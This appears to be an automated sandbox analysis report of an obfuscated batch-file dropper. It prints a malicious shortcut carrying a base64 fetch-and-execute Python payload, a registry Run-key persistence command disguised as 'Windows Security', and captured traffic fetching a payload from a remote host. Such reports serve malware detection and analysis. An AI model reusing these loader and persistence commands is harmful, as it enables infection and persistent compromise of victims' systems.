              SHA1:11E228AD18977F7F48BB6CE9A29AE17AC97911A9
              SHA-256:7AD492E4B7D241459E45AF1E8DCEF56158C02EEBDA70677DA4C5826F1C193904
              SHA-512:988FD457B4B9B81F1872E5A6B6B1B63FA2B9F07342F382CEC5EA745395DBF3FE6234D0653BC26CA68BDC9F0615A48A25354990F2726804A116544A8C86E415A7
              Malicious:false
              Preview:@...e................................................@..........H..............@-....f.J.|.7h8..-.......Microsoft.Powershell.PSReadline.H...............o..b~.D.poM......... .Microsoft.PowerShell.ConsoleHost0......................C.l]..7.s........System..4....................D...{..|f........System.Core.D...............4..7..D.#V.............System.Management.Automation4.................%...K... ...........System.Xml..<...............i..VdqF...|...........System.ConfigurationL.................*gQ?O.....x5.......#.Microsoft.Management.Infrastructure.<................t.,.lG....M...........System.Management...@................z.U..G...5.f.1........System.DirectoryServices8..................1...L..U;V.<}........System.Numerics.4.................0..~.J.R...L........System.Data.H................WY..2.M.&..g*(g........Microsoft.PowerShell.Security...<................$@...J....M+.B........System.Transactions.8.................C}...C....n..Bi.......Microsoft.CSharpP...............
              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
              File Type:ASCII text, with no line terminators
              Category:dropped
              Size (bytes):60
              Entropy (8bit):4.038920595031593
              Encrypted:false
              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
              MD5:D17FE0A3F47BE24A6453E9EF58C94641
              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
              Malicious:false
              Preview:# PowerShell test file to determine AppLocker lockdown mode
              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
              File Type:ASCII text, with no line terminators
              Category:dropped
              Size (bytes):60
              Entropy (8bit):4.038920595031593
              Encrypted:false
              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
              MD5:D17FE0A3F47BE24A6453E9EF58C94641
              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
              Malicious:false
              Preview:# PowerShell test file to determine AppLocker lockdown mode
              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
              File Type:ASCII text, with no line terminators
              Category:dropped
              Size (bytes):60
              Entropy (8bit):4.038920595031593
              Encrypted:false
              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
              MD5:D17FE0A3F47BE24A6453E9EF58C94641
              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
              Malicious:false
              Preview:# PowerShell test file to determine AppLocker lockdown mode
              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
              File Type:ASCII text, with no line terminators
              Category:dropped
              Size (bytes):60
              Entropy (8bit):4.038920595031593
              Encrypted:false
              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
              MD5:D17FE0A3F47BE24A6453E9EF58C94641
              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
              Malicious:false
              Preview:# PowerShell test file to determine AppLocker lockdown mode
              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
              File Type:ASCII text, with no line terminators
              Category:dropped
              Size (bytes):60
              Entropy (8bit):4.038920595031593
              Encrypted:false
              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
              MD5:D17FE0A3F47BE24A6453E9EF58C94641
              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
              Malicious:false
              Preview:# PowerShell test file to determine AppLocker lockdown mode
              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
              File Type:ASCII text, with no line terminators
              Category:dropped
              Size (bytes):60
              Entropy (8bit):4.038920595031593
              Encrypted:false
              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
              MD5:D17FE0A3F47BE24A6453E9EF58C94641
              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
              Malicious:false
              Preview:# PowerShell test file to determine AppLocker lockdown mode
              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
              File Type:ASCII text, with no line terminators
              Category:dropped
              Size (bytes):60
              Entropy (8bit):4.038920595031593
              Encrypted:false
              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
              MD5:D17FE0A3F47BE24A6453E9EF58C94641
              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
              Malicious:false
              Preview:# PowerShell test file to determine AppLocker lockdown mode
              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
              File Type:ASCII text, with no line terminators
              Category:dropped
              Size (bytes):60
              Entropy (8bit):4.038920595031593
              Encrypted:false
              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
              MD5:D17FE0A3F47BE24A6453E9EF58C94641
              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
              Malicious:false
              Preview:# PowerShell test file to determine AppLocker lockdown mode
              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
              File Type:MS Windows shortcut, Item id list present, Has Relative path, Has command line arguments, Icon number=13, ctime=Sun Dec 31 23:25:52 1600, mtime=Sun Dec 31 23:25:52 1600, atime=Sun Dec 31 23:25:52 1600, length=0, window=hidenormalshowminimized
              Category:dropped
              Size (bytes):2318
              Entropy (8bit):2.9377758893269634
              Encrypted:false
              SSDEEP:24:8A1TaRLHrvq9tsDjc+dNlu6VIN2laqddNXuHYJPHAJqy:8bRLHrvq9Gc63uk5dLXuHGAgy
              MD5:20BE2FE2B3E0D2404B467EB1C4FD5FF2
              SHA1:8F6B9E8F7479BB0FBD266EDF4A854D0996C82123
              SHA-256:2D1638D7F8B0CCA7CBB46ACC67E5900BDB25CA70F03384F10542CFFD9CC37F5F
              SHA-512:3C7304F7EAAEE61B26869C5F2B819AACF1D9E417814DD75DB87FF11B5AAE7D6974B912D5961A62C452A2BBC957FEA76F4DD17438864655A588FEAB931A50D8A0
              Malicious:true
              Preview:L..................F.@......................................................G....P.O. .:i.....+00.../C:\...................P.1...........Users.<............................................U.s.e.r.s.....Z.1...........user..B............................................e.n.g.i.n.e.e.r.....V.1...........AppData.@............................................A.p.p.D.a.t.a.....P.1...........Local.<............................................L.o.c.a.l.....`.1...........EAnLaxUKaI..F............................................E.A.n.L.a.x.U.K.a.I.....h.2...........synaptics.exe.L............................................s.y.n.a.p.t.i.c.s...e.x.e...........\.E.A.n.L.a.x.U.K.a.I.\.s.y.n.a.p.t.i.c.s...e.x.e...-.c. .".i.m.p.o.r.t. .b.a.s.e.6.4.;.e.x.e.c.(.b.a.s.e.6.4...b.6.4.d.e.c.o.d.e.(.'.a.W.1.w.b.3.J.0.I.H.V.y.b.G.x.p.Y.i.5.y.Z.X.F.1.Z.X.N.0.O.2.l.t.c.G.9.y.d.C.B.i.Y.X.N.l.N.j.Q.7.Z.X.h.l.Y.y.h.i.Y.X.N.l.N.j.Q.u.Y.j.Y.0.Z.G.V.j.b.2.R.l.K.H.V.y.b.G.x.p.Y.i.5.y.Z.X.F.1.Z.X.N.0.L.n.V.y.b
              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
              File Type:ASCII text, with CRLF line terminators
              Category:dropped
              Size (bytes):217
              Entropy (8bit):5.08581434109059
              Encrypted:false
              SSDEEP:6:s+qoZH1jMhLBKJd8Lfz9S/cuON723yMAtGtv:s+q+VjMd2dafzIcuOaotGtv
              MD5:7A50B9FA1767C1CA8BCB69F03C7312FB
              SHA1:DB6C13AD0ED32C8F78771556077D49269A684C45
              SHA-256:71EBAC11A10FBB3A43A6CB92D387096142435F89D055FDCCC7DC07DDB8EDC553
              SHA-512:660F569FA168F90FD0AE852E8E979C230515C8EC77CA8CFA17E1BAFC5BB46351CD2446DDE73101D9AEBD2615879912C11213A6F6D5747BC34E3213EF4614723C
              Malicious:false
              Preview:New-ItemProperty -Path 'HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run' -Name 'Windows Security' -PropertyType String -Value 'C:\Windows\Explorer.EXE C:\Users\user\AppData\Local\WindowsSecurity.lnk' -Force ..
              Process:C:\Windows\System32\chcp.com
              File Type:ASCII text, with CRLF line terminators
              Category:dropped
              Size (bytes):25
              Entropy (8bit):4.103465189601646
              Encrypted:false
              SSDEEP:3:PHsEiV/:PsES
              MD5:D38306034A39FBDFDAC172946D5EF53F
              SHA1:346E6FF4E144749719368D4A27675C44E742BDCF
              SHA-256:2B06CDF30ADE079C57F6E8EC16FA27563855265463BEDE417A2DD63A631B6A21
              SHA-512:7F3CFF34DB2E1528BA3928E3C41CEC4C6407DFAB4CD57FA298CCD06AA65696FB3321DFCC24A0BF5A7D546F1216E3506F1D26B09B11E5511AD33219913FA149D4
              Malicious:false
              Preview:Active code page: 65001..
              File type:Unicode text, UTF-16, little-endian text, with very long lines (32767), with no line terminators
              Entropy (8bit):5.543646087975015
              TrID:
              • MP3 audio (ID3 v1.x tag) (2501/1) 45.44%
              • Text - UTF-16 (LE) encoded (2002/1) 36.37%
              • MP3 audio (1001/1) 18.19%
              File name:JDHh9P2IVM.bat
              File size:165'820 bytes
              MD5:adabb1b5ab34eceebe677ec0c83131cd
              SHA1:327775de37951a78263245e4b1c648f134e74775
              SHA256:e689601d502cc0cd8017f9d6953ce7e201b2dad42f679dc33afa673249ea1aa4
              SHA512:debed68ca661b1a1a4b853a19b73c1d21a5ee2def7da5d3f5e04160f43aeb60ac83634398369069e4a6538a4b12eb7cf630fcf80dbfceec2814c3eca1fdb8976
              SSDEEP:3072:2BGUgUrsmY3l/dAvyx0XeKiobH5Qx/uOEN+3Rk37YY:2Bh120axYDZKuD03usY
              TLSH:ACF3C022411C5E3F739B636E04B92A1929C88AC740B50FDCF67CAA8A774DD071BB919D
              File Content Preview:..%xgiQxxq%>%TvFfEmYop%%NkgvwlAXa%n%iyiOcHU%%OTUMxGdGY%u%UPLRjaD%%TPmZUKfKL%l%XVtXvgi% %AwpMhkwIN%2%VeDlcCJJ%%gMUQtnxV%>%duhYcpXYi%%tjpdxXC%&%soKSgwEdK%%xANempDXe%1%WxbpuuSrI% %vRxPDxqAu%&%NhOcltN%%TJzypMLg%&%GwviLpVQ% %LEvHcXAy%e%qgZWUOPBe%%xCqkgRe%x%HLr
              Icon Hash:9686878b929a9886
              TimestampSource PortDest PortSource IPDest IP
              Nov 25, 2024 18:01:12.354310989 CET49709443192.168.2.6104.21.81.137
              Nov 25, 2024 18:01:12.354361057 CET44349709104.21.81.137192.168.2.6
              Nov 25, 2024 18:01:12.354543924 CET49709443192.168.2.6104.21.81.137
              Nov 25, 2024 18:01:12.361541033 CET49709443192.168.2.6104.21.81.137
              Nov 25, 2024 18:01:12.361566067 CET44349709104.21.81.137192.168.2.6
              Nov 25, 2024 18:01:13.686248064 CET44349709104.21.81.137192.168.2.6
              Nov 25, 2024 18:01:13.686398983 CET49709443192.168.2.6104.21.81.137
              Nov 25, 2024 18:01:13.688385010 CET49709443192.168.2.6104.21.81.137
              Nov 25, 2024 18:01:13.688405037 CET44349709104.21.81.137192.168.2.6
              Nov 25, 2024 18:01:13.688695908 CET44349709104.21.81.137192.168.2.6
              Nov 25, 2024 18:01:13.707828999 CET49709443192.168.2.6104.21.81.137
              Nov 25, 2024 18:01:13.751332998 CET44349709104.21.81.137192.168.2.6
              Nov 25, 2024 18:01:14.523978949 CET44349709104.21.81.137192.168.2.6
              Nov 25, 2024 18:01:14.524117947 CET44349709104.21.81.137192.168.2.6
              Nov 25, 2024 18:01:14.524184942 CET49709443192.168.2.6104.21.81.137
              Nov 25, 2024 18:01:14.524213076 CET44349709104.21.81.137192.168.2.6
              Nov 25, 2024 18:01:14.524296999 CET44349709104.21.81.137192.168.2.6
              Nov 25, 2024 18:01:14.524373055 CET44349709104.21.81.137192.168.2.6
              Nov 25, 2024 18:01:14.524375916 CET49709443192.168.2.6104.21.81.137
              Nov 25, 2024 18:01:14.524400949 CET44349709104.21.81.137192.168.2.6
              Nov 25, 2024 18:01:14.524446964 CET49709443192.168.2.6104.21.81.137
              Nov 25, 2024 18:01:14.524487972 CET44349709104.21.81.137192.168.2.6
              Nov 25, 2024 18:01:14.532371998 CET44349709104.21.81.137192.168.2.6
              Nov 25, 2024 18:01:14.532434940 CET49709443192.168.2.6104.21.81.137
              Nov 25, 2024 18:01:14.532445908 CET44349709104.21.81.137192.168.2.6
              Nov 25, 2024 18:01:14.540798903 CET44349709104.21.81.137192.168.2.6
              Nov 25, 2024 18:01:14.540884972 CET49709443192.168.2.6104.21.81.137
              Nov 25, 2024 18:01:14.540911913 CET44349709104.21.81.137192.168.2.6
              Nov 25, 2024 18:01:14.583139896 CET49709443192.168.2.6104.21.81.137
              Nov 25, 2024 18:01:14.644459963 CET44349709104.21.81.137192.168.2.6
              Nov 25, 2024 18:01:14.692523956 CET49709443192.168.2.6104.21.81.137
              Nov 25, 2024 18:01:14.692542076 CET44349709104.21.81.137192.168.2.6
              Nov 25, 2024 18:01:14.734350920 CET44349709104.21.81.137192.168.2.6
              Nov 25, 2024 18:01:14.734493017 CET49709443192.168.2.6104.21.81.137
              Nov 25, 2024 18:01:14.734519958 CET44349709104.21.81.137192.168.2.6
              Nov 25, 2024 18:01:14.746032953 CET44349709104.21.81.137192.168.2.6
              Nov 25, 2024 18:01:14.746125937 CET44349709104.21.81.137192.168.2.6
              Nov 25, 2024 18:01:14.746176958 CET49709443192.168.2.6104.21.81.137
              Nov 25, 2024 18:01:14.746203899 CET44349709104.21.81.137192.168.2.6
              Nov 25, 2024 18:01:14.746279001 CET49709443192.168.2.6104.21.81.137
              Nov 25, 2024 18:01:14.754523993 CET44349709104.21.81.137192.168.2.6
              Nov 25, 2024 18:01:14.761847019 CET44349709104.21.81.137192.168.2.6
              Nov 25, 2024 18:01:14.761887074 CET44349709104.21.81.137192.168.2.6
              Nov 25, 2024 18:01:14.761915922 CET49709443192.168.2.6104.21.81.137
              Nov 25, 2024 18:01:14.761965990 CET44349709104.21.81.137192.168.2.6
              Nov 25, 2024 18:01:14.762018919 CET49709443192.168.2.6104.21.81.137
              Nov 25, 2024 18:01:14.769767046 CET44349709104.21.81.137192.168.2.6
              Nov 25, 2024 18:01:14.777858019 CET44349709104.21.81.137192.168.2.6
              Nov 25, 2024 18:01:14.777954102 CET49709443192.168.2.6104.21.81.137
              Nov 25, 2024 18:01:14.777980089 CET44349709104.21.81.137192.168.2.6
              Nov 25, 2024 18:01:14.785784960 CET44349709104.21.81.137192.168.2.6
              Nov 25, 2024 18:01:14.785855055 CET49709443192.168.2.6104.21.81.137
              Nov 25, 2024 18:01:14.785862923 CET44349709104.21.81.137192.168.2.6
              Nov 25, 2024 18:01:14.792716980 CET44349709104.21.81.137192.168.2.6
              Nov 25, 2024 18:01:14.792794943 CET49709443192.168.2.6104.21.81.137
              Nov 25, 2024 18:01:14.792800903 CET44349709104.21.81.137192.168.2.6
              Nov 25, 2024 18:01:14.806912899 CET44349709104.21.81.137192.168.2.6
              Nov 25, 2024 18:01:14.806957960 CET44349709104.21.81.137192.168.2.6
              Nov 25, 2024 18:01:14.806988955 CET49709443192.168.2.6104.21.81.137
              Nov 25, 2024 18:01:14.807019949 CET44349709104.21.81.137192.168.2.6
              Nov 25, 2024 18:01:14.807065010 CET49709443192.168.2.6104.21.81.137
              Nov 25, 2024 18:01:14.814106941 CET44349709104.21.81.137192.168.2.6
              Nov 25, 2024 18:01:14.821295977 CET44349709104.21.81.137192.168.2.6
              Nov 25, 2024 18:01:14.821343899 CET44349709104.21.81.137192.168.2.6
              Nov 25, 2024 18:01:14.821362972 CET49709443192.168.2.6104.21.81.137
              Nov 25, 2024 18:01:14.821373940 CET44349709104.21.81.137192.168.2.6
              Nov 25, 2024 18:01:14.821459055 CET49709443192.168.2.6104.21.81.137
              Nov 25, 2024 18:01:14.828263998 CET44349709104.21.81.137192.168.2.6
              Nov 25, 2024 18:01:14.880145073 CET49709443192.168.2.6104.21.81.137
              Nov 25, 2024 18:01:14.945518017 CET44349709104.21.81.137192.168.2.6
              Nov 25, 2024 18:01:14.947916031 CET44349709104.21.81.137192.168.2.6
              Nov 25, 2024 18:01:14.947987080 CET49709443192.168.2.6104.21.81.137
              Nov 25, 2024 18:01:14.947994947 CET44349709104.21.81.137192.168.2.6
              Nov 25, 2024 18:01:14.948012114 CET44349709104.21.81.137192.168.2.6
              Nov 25, 2024 18:01:14.948048115 CET49709443192.168.2.6104.21.81.137
              Nov 25, 2024 18:01:14.953139067 CET44349709104.21.81.137192.168.2.6
              Nov 25, 2024 18:01:14.963294983 CET44349709104.21.81.137192.168.2.6
              Nov 25, 2024 18:01:14.963366985 CET49709443192.168.2.6104.21.81.137
              Nov 25, 2024 18:01:14.963376045 CET44349709104.21.81.137192.168.2.6
              Nov 25, 2024 18:01:14.963414907 CET49709443192.168.2.6104.21.81.137
              Nov 25, 2024 18:01:14.968610048 CET44349709104.21.81.137192.168.2.6
              Nov 25, 2024 18:01:14.968616962 CET44349709104.21.81.137192.168.2.6
              Nov 25, 2024 18:01:14.968672037 CET49709443192.168.2.6104.21.81.137
              Nov 25, 2024 18:01:14.977875948 CET44349709104.21.81.137192.168.2.6
              Nov 25, 2024 18:01:14.977890015 CET44349709104.21.81.137192.168.2.6
              Nov 25, 2024 18:01:14.977979898 CET49709443192.168.2.6104.21.81.137
              Nov 25, 2024 18:01:14.985392094 CET49709443192.168.2.6104.21.81.137
              Nov 25, 2024 18:01:14.985450029 CET44349709104.21.81.137192.168.2.6
              Nov 25, 2024 18:01:14.985523939 CET49709443192.168.2.6104.21.81.137
              TimestampSource PortDest PortSource IPDest IP
              Nov 25, 2024 18:01:12.126306057 CET6152653192.168.2.61.1.1.1
              Nov 25, 2024 18:01:12.346731901 CET53615261.1.1.1192.168.2.6
              TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
              Nov 25, 2024 18:01:12.126306057 CET192.168.2.61.1.1.10xc386Standard query (0)tvdseo.comA (IP address)IN (0x0001)false
              TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
              Nov 25, 2024 18:01:12.346731901 CET1.1.1.1192.168.2.60xc386No error (0)tvdseo.com104.21.81.137A (IP address)IN (0x0001)false
              Nov 25, 2024 18:01:12.346731901 CET1.1.1.1192.168.2.60xc386No error (0)tvdseo.com172.67.189.157A (IP address)IN (0x0001)false
              • tvdseo.com
              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
              0192.168.2.649709104.21.81.1374433796C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
              TimestampBytes transferredDirectionData
              2024-11-25 17:01:13 UTC78OUTGET /file/synaptics.zip HTTP/1.1
              Host: tvdseo.com
              Connection: Keep-Alive
              2024-11-25 17:01:14 UTC1076INHTTP/1.1 404 Not Found
              Date: Mon, 25 Nov 2024 17:01:14 GMT
              Content-Type: text/html; charset=UTF-8
              Transfer-Encoding: chunked
              Connection: close
              x-powered-by: PHP/8.2.15
              expires: Wed, 11 Jan 1984 05:00:00 GMT
              cache-control: max-age=14400, must-revalidate
              link: <https://tvdseo.com/wp-json/>; rel="https://api.w.org/"
              vary: Accept-Encoding
              platform: hostinger
              panel: hpanel
              content-security-policy: upgrade-insecure-requests
              x-turbo-charged-by: LiteSpeed
              CF-Cache-Status: EXPIRED
              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=VUqi3T9nF8tfuQNa51Jyj44l8YwFa1wGcBcxGCPQsPw7pKwcNu6M%2B184GvMdYSVfW5J0jlAcyP2Xz3GjDsz6qHuJHaXOtE5531foaPt%2B9s%2Bq6Etwmub4y3mPbvio"}],"group":"cf-nel","max_age":604800}
              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
              Server: cloudflare
              CF-RAY: 8e8333124be40c7c-EWR
              alt-svc: h3=":443"; ma=86400
              server-timing: cfL4;desc="?proto=TCP&rtt=2125&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2822&recv_bytes=692&delivery_rate=680970&cwnd=129&unsent_bytes=0&cid=4dfb5a33c3be23e9&ts=854&x=0"
              2024-11-25 17:01:14 UTC293INData Raw: 34 30 30 31 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 76 69 22 20 63 6c 61 73 73 3d 22 6c 6f 61 64 69 6e 67 2d 73 69 74 65 20 6e 6f 2d 6a 73 22 3e 0a 3c 68 65 61 64 3e 0a 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 20 2f 3e 0a 09 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 6f 66 69 6c 65 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 67 6d 70 67 2e 6f 72 67 2f 78 66 6e 2f 31 31 22 20 2f 3e 0a 09 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 69 6e 67 62 61 63 6b 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 74 76 64 73 65 6f 2e 63 6f 6d 2f 78 6d 6c 72 70 63 2e 70 68 70 22 20 2f 3e 0a 0a 09 3c 73 63 72 69 70 74 3e 28 66 75 6e 63 74 69 6f 6e 28 68 74 6d 6c 29 7b 68 74 6d 6c 2e 63 6c 61 73 73 4e 61 6d
              Data Ascii: 4001<!DOCTYPE html><html lang="vi" class="loading-site no-js"><head><meta charset="UTF-8" /><link rel="profile" href="https://gmpg.org/xfn/11" /><link rel="pingback" href="https://tvdseo.com/xmlrpc.php" /><script>(function(html){html.classNam
              2024-11-25 17:01:14 UTC1369INData Raw: 2c 27 6a 73 27 29 7d 29 28 64 6f 63 75 6d 65 6e 74 2e 64 6f 63 75 6d 65 6e 74 45 6c 65 6d 65 6e 74 29 3b 3c 2f 73 63 72 69 70 74 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 27 72 6f 62 6f 74 73 27 20 63 6f 6e 74 65 6e 74 3d 27 6e 6f 69 6e 64 65 78 2c 20 66 6f 6c 6c 6f 77 27 20 2f 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 20 2f 3e 3c 21 2d 2d 20 43 68 e1 ba bf 20 c4 91 e1 bb 99 20 c4 91 e1 bb 93 6e 67 20 c3 bd 20 47 6f 6f 67 6c 65 20 74 61 67 20 28 67 74 61 67 2e 6a 73 29 20 64 61 74 61 4c 61 79 65 72 20 c4 91 c6 b0 e1 bb a3 63 20 74 68 c3 aa 6d 20 62 e1 bb 9f 69 20 53 69 74 65 20 4b 69 74 20 2d 2d
              Data Ascii: ,'js')})(document.documentElement);</script><meta name='robots' content='noindex, follow' /><meta name="viewport" content="width=device-width, initial-scale=1" />... Ch ng Google tag (gtag.js) dataLayer c thm bi Site Kit --
              2024-11-25 17:01:14 UTC1369INData Raw: 2c 22 47 42 22 2c 22 47 52 22 2c 22 48 52 22 2c 22 48 55 22 2c 22 49 45 22 2c 22 49 53 22 2c 22 49 54 22 2c 22 4c 49 22 2c 22 4c 54 22 2c 22 4c 55 22 2c 22 4c 56 22 2c 22 4d 54 22 2c 22 4e 4c 22 2c 22 4e 4f 22 2c 22 50 4c 22 2c 22 50 54 22 2c 22 52 4f 22 2c 22 53 45 22 2c 22 53 49 22 2c 22 53 4b 22 5d 2c 22 77 61 69 74 5f 66 6f 72 5f 75 70 64 61 74 65 22 3a 35 30 30 7d 3c 2f 73 63 72 69 70 74 3e 0a 3c 21 2d 2d 20 4b e1 ba bf 74 20 74 68 c3 ba 63 20 74 68 e1 ba bb 20 47 6f 6f 67 6c 65 20 28 67 74 61 67 2e 6a 73 29 20 63 68 e1 ba bf 20 c4 91 e1 bb 99 20 c4 91 e1 bb 93 6e 67 20 c3 bd 20 64 61 74 61 4c 61 79 65 72 20 c4 91 c6 b0 e1 bb a3 63 20 74 68 c3 aa 6d 20 62 e1 bb 9f 69 20 53 69 74 65 20 4b 69 74 20 2d 2d 3e 0a 09 09 09 0a 09 3c 21 2d 2d 20 54 68 69 73
              Data Ascii: ,"GB","GR","HR","HU","IE","IS","IT","LI","LT","LU","LV","MT","NL","NO","PL","PT","RO","SE","SI","SK"],"wait_for_update":500}</script>... Kt thc th Google (gtag.js) ch ng dataLayer c thm bi Site Kit -->... This
              2024-11-25 17:01:14 UTC1369INData Raw: 4c 61 6e 67 75 61 67 65 22 3a 22 76 69 22 2c 22 40 69 64 22 3a 22 68 74 74 70 73 3a 2f 2f 74 76 64 73 65 6f 2e 63 6f 6d 2f 23 2f 73 63 68 65 6d 61 2f 6c 6f 67 6f 2f 69 6d 61 67 65 2f 22 2c 22 75 72 6c 22 3a 22 68 74 74 70 73 3a 2f 2f 74 76 64 73 65 6f 2e 63 6f 6d 2f 77 70 2d 63 6f 6e 74 65 6e 74 2f 75 70 6c 6f 61 64 73 2f 32 30 32 33 2f 30 33 2f 63 72 6f 70 70 65 64 2d 4c 4f 47 4f 2d 54 56 44 2d 53 45 4f 2d 56 55 4f 4e 47 2e 70 6e 67 22 2c 22 63 6f 6e 74 65 6e 74 55 72 6c 22 3a 22 68 74 74 70 73 3a 2f 2f 74 76 64 73 65 6f 2e 63 6f 6d 2f 77 70 2d 63 6f 6e 74 65 6e 74 2f 75 70 6c 6f 61 64 73 2f 32 30 32 33 2f 30 33 2f 63 72 6f 70 70 65 64 2d 4c 4f 47 4f 2d 54 56 44 2d 53 45 4f 2d 56 55 4f 4e 47 2e 70 6e 67 22 2c 22 77 69 64 74 68 22 3a 35 31 32 2c 22 68 65
              Data Ascii: Language":"vi","@id":"https://tvdseo.com/#/schema/logo/image/","url":"https://tvdseo.com/wp-content/uploads/2023/03/cropped-LOGO-TVD-SEO-VUONG.png","contentUrl":"https://tvdseo.com/wp-content/uploads/2023/03/cropped-LOGO-TVD-SEO-VUONG.png","width":512,"he
              2024-11-25 17:01:14 UTC1369INData Raw: 8b 63 68 20 56 e1 bb a5 20 53 45 4f 20 20 26 72 61 71 75 6f 3b 20 44 c3 b2 6e 67 20 62 c3 ac 6e 68 20 6c 75 e1 ba ad 6e 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 74 76 64 73 65 6f 2e 63 6f 6d 2f 63 6f 6d 6d 65 6e 74 73 2f 66 65 65 64 2f 22 20 2f 3e 0a 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 3e 0a 2f 2a 20 3c 21 5b 43 44 41 54 41 5b 20 2a 2f 0a 77 69 6e 64 6f 77 2e 5f 77 70 65 6d 6f 6a 69 53 65 74 74 69 6e 67 73 20 3d 20 7b 22 62 61 73 65 55 72 6c 22 3a 22 68 74 74 70 73 3a 5c 2f 5c 2f 73 2e 77 2e 6f 72 67 5c 2f 69 6d 61 67 65 73 5c 2f 63 6f 72 65 5c 2f 65 6d 6f 6a 69 5c 2f 31 35 2e 30 2e 33 5c 2f 37 32 78 37 32 5c 2f 22 2c 22 65 78 74 22 3a 22 2e 70 6e 67 22 2c 22 73 76 67 55 72 6c 22 3a 22 68 74 74
